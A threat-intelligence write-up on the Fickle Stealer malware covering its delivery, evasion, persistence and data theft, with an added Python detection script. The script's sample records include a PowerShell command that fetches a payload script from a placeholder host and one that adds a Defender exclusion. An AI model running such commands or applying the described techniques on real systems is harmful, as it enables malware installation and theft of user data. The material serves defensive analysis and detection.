A new Rust-based stealer malware, Fickle Stealer, targets Windows machines and utilizes multiple techniques for delivery, including VBA macros and downloaders, by leveraging Rust’s complex assembly code to potentially evade detection.
In some instances it first bypasses User Account Control (UAC) using PowerShell scripts; it then performs anti-analysis checks and gathers system information.
It then communicates with a command and control server to receive a target list, which can include cryptocurrency wallets, browser data, and application-specific files, where the stolen information is exfiltrated in a JSON format.
Fickle Stealer is delivered in several ways. VBA droppers are Word documents whose macros execute encoded scripts stored in XML files, downloading the malware to the Temp folder.
VBA downloaders come in three forms: one directly downloads the PowerShell script (u.ps1 or bypass.ps1), another uses forfiles.exe to bypass detection, and the third leverages a web browser control to download the script indirectly.
Link downloaders deliver the malicious script through a direct link, while executable downloaders masquerade as legitimate applications, such as a PDF viewer, to deploy the PowerShell script. All these methods typically download the PowerShell script for further action.
Preparatory Work for Infection
The attackers use a malicious MMC file (WmiMgmt.msc) that leverages a Shockwave Flash Object from ActiveX to launch a web server on localhost, which delivers a webpage containing a script that configures exclusions for Fickle Stealer and downloads it for execution.
The script exploits trusted directory paths and MMC’s language search priority to achieve persistence with elevated privileges. Another script, engine.ps1, searches for executable files on specific drives and injects shellcode via inject.ps1 to download u.ps1.
To maintain communication, all three scripts (u.ps1, engine.ps1, and inject.ps1) periodically download and execute tgmes.ps1 to send their status and victim information (country, city, IP, OS version, computer name, and username) to the attacker’s Telegram bot.
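As an added detection example (not code from the original article or from Fortinet's report), the following Python scans constructed process-creation records for the delivery chain described above: an Office process or forfiles.exe spawning PowerShell, PowerShell command lines naming u.ps1, bypass.ps1, engine.ps1, inject.ps1 or tgmes.ps1, PowerShell adding exclusions (assumed here to be Microsoft Defender exclusions via Add-MpPreference), and mmc.exe loading WmiMgmt.msc from outside System32 (a heuristic assumption, since the article only says trusted directory paths are abused). The `parent|image|cmdline` record format, hostnames and paths are all constructed.

```python
import re

# Indicators named in the report above (script names, the MMC file, forfiles.exe).
SCRIPT_NAMES = ("u.ps1", "bypass.ps1", "engine.ps1", "inject.ps1", "tgmes.ps1")
OFFICE_PARENTS = {"winword.exe", "excel.exe"}

def _base(path: str) -> str:
    """Lower-cased file name of an image path (Windows or POSIX separators)."""
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]

def assess_event(parent: str, image: str, cmdline: str) -> list[str]:
    """Return the reasons one process-creation event matches the reported chain."""
    reasons = []
    par, img, cmd = _base(parent), _base(image), cmdline.lower()
    if img in ("powershell.exe", "pwsh.exe"):
        # A script name must start a path component, so menu.ps1 does not match u.ps1.
        hits = [n for n in SCRIPT_NAMES if re.search(r"(?<![\w.-])" + re.escape(n), cmd)]
        if hits:
            reasons.append("references reported script name(s): " + ", ".join(hits))
        if "add-mppreference" in cmd and "-exclusion" in cmd:
            reasons.append("adds a Defender exclusion (assumed exclusion mechanism)")
        if par in OFFICE_PARENTS:
            reasons.append(f"PowerShell spawned by Office process {par} (VBA delivery)")
        if par == "forfiles.exe":
            reasons.append("PowerShell spawned via forfiles.exe")
    if img == "mmc.exe" and "wmimgmt.msc" in cmd and "\\system32\\" not in cmd:
        reasons.append("mmc.exe loading WmiMgmt.msc outside System32 (heuristic)")
    return reasons

def scan(records: list[str]) -> list[tuple[int, list[str]]]:
    """Scan 'parent|image|cmdline' records; return (record number, reasons) per alert."""
    alerts = []
    for n, rec in enumerate(records, 1):
        parts = rec.split("|", 2)
        if len(parts) == 3 and (reasons := assess_event(*parts)):
            alerts.append((n, reasons))
    return alerts

# Constructed sample records; the hostname and paths are placeholders, not real IoCs.
SAMPLE_LOG = [
    r"C:\Windows\explorer.exe|C:\Windows\System32\mmc.exe|mmc.exe C:\Windows\System32\WmiMgmt.msc",
    r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c iwr http://example.invalid/u.ps1 -OutFile $env:TEMP\u.ps1",
    r"C:\Windows\System32\forfiles.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -f C:\Users\Public\bypass.ps1",
    r"C:\Windows\explorer.exe|C:\Windows\System32\mmc.exe|mmc.exe C:\Users\Public\WmiMgmt.msc",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c Add-MpPreference -ExclusionPath $env:TEMP",
    r"C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd /c dir",
]

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOG):
        print(f"record {n}: " + "; ".join(reasons))
```

Records 1 and 6 are benign controls; the remaining four each trip at least one rule.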
Fickle Stealer employs various anti-analysis techniques to evade detection in sandbox environments by checking for a debugger, terminating the process if one is present, and comparing process names and loaded DLLs against blacklists of known analysis tools.
It queries the system for specific virtual machine hardware IDs and WMI objects, exiting if the results are null (as they would be in a virtual environment), and verifies the system's hardware UUID against a blacklist to identify potential analysis systems.
According to Fortinet, it targets various data based on server instructions, and exfiltrates entire folders containing crypto wallets (AtomicWallet, Exodus, etc.) identified by the “wallet::” tag. Additionally, it searches for plugin data (Authenticator, Bitwarden, etc.) marked with the “plugin___” tag within specified directories.
For file extensions, it grabs files with extensions such as .txt, .docx, and .pdf from user profiles, while searching specific subfolders under AppData paths (e.g., Discord, Chrome) for potential login data files (discord_dblist.txt) marked with the “grabg::” tag.